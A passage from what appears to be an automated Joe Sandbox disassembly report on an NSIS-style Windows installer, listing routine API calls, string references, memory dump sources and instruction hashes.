                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 2531174081-0
                                                              • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                              • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                              • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                              • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                              • GetMessagePos.USER32 ref: 00404BD3
                                                              • ScreenToClient.USER32(?,?), ref: 00404BED
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                              • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                              • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                              • MulDiv.KERNEL32(000F45F7,00000064,000F47FB), ref: 00402E20
                                                              • wsprintfW.USER32 ref: 00402E30
                                                              • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                              Strings
                                                              • verifying installer: %d%%, xrefs: 00402E2A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: verifying installer: %d%%
                                                              • API String ID: 1451636040-82062127
                                                              • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                              • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                              • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                              • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                              APIs
                                                                • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                              • GlobalFree.KERNEL32(?), ref: 1000256D
                                                              • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                              • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                              • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                              • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                              • GlobalFree.KERNEL32(?), ref: 00402950
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                              • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                              • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                              • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsj4634.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsj4634.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsj4634.tmp$C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll
                                                              • API String ID: 3109718747-2723373905
                                                              • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                              • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                              • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                              • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FreeGlobal
                                                              • String ID:
                                                              • API String ID: 2979337801-0
                                                              • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                              • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                              • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                              • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                              • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                              • String ID:
                                                              • API String ID: 4216380887-0
                                                              • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                              • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                              • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                              • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401DB6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID:
                                                              • API String ID: 3808545654-0
                                                              • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                              • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                              • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                              • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                              • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                               • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                              • String ID:
                                                              • API String ID: 1148316912-0
                                                              • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                              • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                              • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                              • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                              • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                              • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                              • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                              • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                              • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                              • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                              • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                              • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                              APIs
                                                              • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                              • wsprintfW.USER32 ref: 00404B4C
                                                              • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s
                                                              • API String ID: 3540041739-3551169577
                                                              • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                              • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                              • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                              • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B75
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-823278215
                                                              • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                              • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                              • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                              • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                              • GetTickCount.KERNEL32 ref: 00402E8E
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                              • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                              • String ID:
                                                              • API String ID: 2102729457-0
                                                              • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                              • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                              • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                              • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                              • GlobalFree.KERNEL32(?), ref: 0040391C
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
